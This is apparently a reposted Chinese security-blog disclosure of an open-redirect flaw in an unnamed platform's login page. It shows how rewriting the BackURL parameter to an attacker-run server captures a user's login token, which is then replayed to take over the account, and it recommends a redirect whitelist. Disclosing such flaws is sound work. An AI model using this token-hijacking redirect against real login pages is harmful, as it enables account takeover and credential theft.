某信息化平台登录处存在账户劫持漏洞

admin 2020年10月26日11:30:50评论101 views字数 684阅读2分16秒阅读模式

点击蓝字 ·  关注我们

01

漏洞标题

某信息化平台登录处存在账户劫持漏洞

02

漏洞类型

URL跳转

03

漏洞等级

高危

04

漏洞地址

http://xx.xx.xx.xx:8809/Home/AdminPretty

05

漏洞详情


0x01

某信息化平台登录处存在URL跳转,这里可以利用这个跳转劫持登录用户的账户凭证。
http://xx.xx.xx.xx:8808/Login/xxxIndex?BackURL=http://xx.xx.xx.xx:8809/Home/Admin


某信息化平台登录处存在账户劫持漏洞


0x02

这里搭配自己的服务器,完成劫持过程:

首先变化下登录链接,将跳转后的地址换成自己的服务器地址:

http://xx.xx.xx.xx:8808/Login/xxxIndex?BackURL=http://xx.xx.xx.xx:2333/


某信息化平台登录处存在账户劫持漏洞


0x03

将上面链接发送给用户,只要用户正常登录,服务器这边就能收到用户的登录凭证:

/?Token=8B0D78A4D3087010D1AAFA060CD420C44C2D283E53A0B430016631DD6B2B4DE1317D9935FA9F602B,test01


然后加上原来的地址,直接可以登录系统.


某信息化平台登录处存在账户劫持漏洞

06

漏洞危害

  1. 用户点击上面发送的ip链接就可以导致账户被攻击者登录
  2. 利用任意的URL跳转的问题可以跳转到其他网站

07

建议措施

限制登录后的URL跳转范围,定义白名单.


PS:本文仅用于技术讨论与分析,严禁用于任何非法用途,违者后果自负


EDI安全

某信息化平台登录处存在账户劫持漏洞

扫二维码|关注我们

一个专注渗透实战经验分享的公众号


本文始发于微信公众号(EDI安全):某信息化平台登录处存在账户劫持漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年10月26日11:30:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某信息化平台登录处存在账户劫持漏洞http://cn-sec.com/archives/170500.html

发表评论

匿名网友 填写信息